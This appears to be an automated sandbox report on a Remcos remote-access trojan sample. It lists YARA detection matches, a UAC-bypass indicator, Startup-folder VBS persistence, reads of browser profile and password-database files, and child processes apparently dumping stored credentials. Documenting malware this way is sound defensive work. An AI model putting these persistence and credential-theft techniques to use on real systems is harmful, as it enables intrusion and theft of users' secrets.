Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 6_2_00449ED0	6_2_00449ED0
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 6_2_0041FE83	6_2_0041FE83
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 6_2_00430F54	6_2_00430F54
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 7_2_004050C2	7_2_004050C2
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 7_2_004014AB	7_2_004014AB
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 7_2_00405133	7_2_00405133
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 7_2_004051A4	7_2_004051A4
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 7_2_00401246	7_2_00401246
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 7_2_0040CA46	7_2_0040CA46
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 7_2_00405235	7_2_00405235
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 7_2_004032C8	7_2_004032C8
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 7_2_00401689	7_2_00401689
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 7_2_00402F60	7_2_00402F60
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 10_2_0041D071	10_2_0041D071
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 10_2_004520D2	10_2_004520D2
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 10_2_0043D098	10_2_0043D098
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 10_2_00437150	10_2_00437150
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 10_2_004361AA	10_2_004361AA
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 10_2_00426254	10_2_00426254
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 10_2_00431377	10_2_00431377
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 10_2_0043651C	10_2_0043651C
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 10_2_0041E5DF	10_2_0041E5DF
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 10_2_0044C739	10_2_0044C739
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 10_2_004367C6	10_2_004367C6
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 10_2_004267CB	10_2_004267CB
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 10_2_0043C9DD	10_2_0043C9DD
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 10_2_00432A49	10_2_00432A49
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 10_2_00436A8D	10_2_00436A8D
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 10_2_0043CC0C	10_2_0043CC0C
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 10_2_00436D48	10_2_00436D48
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 10_2_00434D22	10_2_00434D22
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 10_2_00426E73	10_2_00426E73
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 10_2_00440E20	10_2_00440E20
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 10_2_0043CE3B	10_2_0043CE3B
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 10_2_00412F45	10_2_00412F45
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 10_2_00452F00	10_2_00452F00
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 10_2_00426FAD	10_2_00426FAD
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 10_2_017FF018	10_2_017FF018

Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: String function: 004169A7 appears 86 times
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: String function: 004165FF appears 35 times
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: String function: 00422297 appears 42 times
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: String function: 00401D64 appears 43 times
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: String function: 00447174 appears 36 times
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: String function: 00401F66 appears 100 times
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: String function: 00401FAA appears 42 times
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: String function: 00403B40 appears 44 times
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: String function: 00433FB0 appears 110 times
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: String function: 00444B14 appears 56 times
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: String function: 00404C9E appears 32 times
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: String function: 004020E7 appears 79 times
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: String function: 0044DB70 appears 41 times
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: String function: 00401E8F appears 37 times
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: String function: 004040BB appears 36 times
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: String function: 00410D8D appears 36 times
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: String function: 00444B5A appears 37 times
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: String function: 004338A5 appears 82 times
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: String function: 00413025 appears 78 times
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: String function: 00416760 appears 69 times

Source: bwYw3UUfy7.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: 10.2.Graff.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 10.2.Graff.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 10.2.Graff.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 10.2.Graff.exe.4010000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 10.2.Graff.exe.4010000.2.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 10.2.Graff.exe.4010000.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 2.2.Graff.exe.3bf0000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 2.2.Graff.exe.3bf0000.2.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 2.2.Graff.exe.3bf0000.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 2.2.Graff.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 2.2.Graff.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 2.2.Graff.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 10.2.Graff.exe.4010000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 10.2.Graff.exe.4010000.2.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 10.2.Graff.exe.4010000.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 2.2.Graff.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 2.2.Graff.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 2.2.Graff.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 10.2.Graff.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 10.2.Graff.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 10.2.Graff.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 2.2.Graff.exe.3bf0000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 2.2.Graff.exe.3bf0000.2.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 2.2.Graff.exe.3bf0000.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 0000000A.00000002.1512305298.0000000004010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0000000A.00000002.1512305298.0000000004010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000000A.00000002.1512305298.0000000004010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 0000000A.00000002.1511116716.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0000000A.00000002.1511116716.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000000A.00000002.1511116716.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000002.00000002.3742130594.0000000003BF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000002.00000002.3742130594.0000000003BF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000002.00000002.3742130594.0000000003BF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: Process Memory Space: Graff.exe PID: 7792, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: Graff.exe PID: 1436, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.rans.phis.troj.spyw.expl.evad.winEXE@14/10@1/2

Source: C:\Users\user\Desktop\bwYw3UUfy7.exe

Code function: 0_2_007A37B5 GetLastError,FormatMessageW,

0_2_007A37B5

Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 2_2_00416AB7 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,	2_2_00416AB7
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 7_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,CloseHandle,	7_2_00410DE1
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 10_2_00416AB7 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,	10_2_00416AB7

Source: C:\Users\user\AppData\Local\misruling\Graff.exe

Code function: 4_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free,

4_2_00418758

Source: C:\Users\user\Desktop\bwYw3UUfy7.exe

Code function: 0_2_0079D4DC CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

0_2_0079D4DC

Source: C:\Users\user\Desktop\bwYw3UUfy7.exe

Code function: 0_2_007342A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

0_2_007342A2

Source: C:\Users\user\AppData\Local\misruling\Graff.exe

Code function: 2_2_00419BC4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,

2_2_00419BC4

Source: C:\Users\user\Desktop\bwYw3UUfy7.exe

File created: C:\Users\user\AppData\Local\misruling

Jump to behavior

Source: C:\Users\user\AppData\Local\misruling\Graff.exe

Mutant created: \Sessions\1\BaseNamedObjects\Rmc-MKYDDH

Source: C:\Users\user\Desktop\bwYw3UUfy7.exe

File created: C:\Users\user\AppData\Local\Temp\aut2C95.tmp

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Graff.vbs"

Source: C:\Users\user\AppData\Local\misruling\Graff.exe

System information queried: HandleInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\misruling\Graff.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Users\user\Desktop\bwYw3UUfy7.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Graff.exe, Graff.exe, 00000004.00000002.1396884825.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: Graff.exe, Graff.exe, 00000006.00000002.1375882489.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: Graff.exe, 00000002.00000002.3743279377.00000000072C0000.00000040.10000000.00040000.00000000.sdmp, Graff.exe, 00000004.00000002.1396884825.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: Graff.exe, Graff.exe, 00000004.00000002.1396884825.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
Source: Graff.exe, Graff.exe, 00000004.00000002.1396884825.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: Graff.exe, Graff.exe, 00000004.00000002.1396884825.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: Graff.exe, 00000004.00000002.1397860909.0000000002F2C000.00000004.00000020.00020000.00000000.sdmp, Graff.exe, 00000004.00000003.1394170456.0000000002F2E000.00000004.00000020.00020000.00000000.sdmp, Graff.exe, 00000004.00000003.1396635433.0000000002F2C000.00000004.00000020.00020000.00000000.sdmp, Graff.exe, 00000004.00000003.1396298511.0000000002F21000.00000004.00000020.00020000.00000000.sdmp, Graff.exe, 00000004.00000003.1393805588.0000000002F2E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: Graff.exe, Graff.exe, 00000004.00000002.1396884825.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: SELECT 'DELETE FROM vacuum_db.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'

Source: bwYw3UUfy7.exe	Virustotal: Detection: 71%
Source: bwYw3UUfy7.exe	ReversingLabs: Detection: 71%

Source: C:\Users\user\Desktop\bwYw3UUfy7.exe

File read: C:\Users\user\Desktop\bwYw3UUfy7.exe

Jump to behavior

Source: C:\Users\user\AppData\Local\misruling\Graff.exe

Evasive API call chain: __getmainargs,DecisionNodes,exit

Source: unknown	Process created: C:\Users\user\Desktop\bwYw3UUfy7.exe "C:\Users\user\Desktop\bwYw3UUfy7.exe"
Source: C:\Users\user\Desktop\bwYw3UUfy7.exe	Process created: C:\Users\user\AppData\Local\misruling\Graff.exe "C:\Users\user\Desktop\bwYw3UUfy7.exe"
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Process created: C:\Users\user\AppData\Local\misruling\Graff.exe C:\Users\user\AppData\Local\misruling\Graff.exe /stext "C:\Users\user\AppData\Local\Temp\molcoacbwimigbrwpmuqe"
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Process created: C:\Users\user\AppData\Local\misruling\Graff.exe C:\Users\user\AppData\Local\misruling\Graff.exe /stext "C:\Users\user\AppData\Local\Temp\wiznptnvkrevjhgaywhspkne"
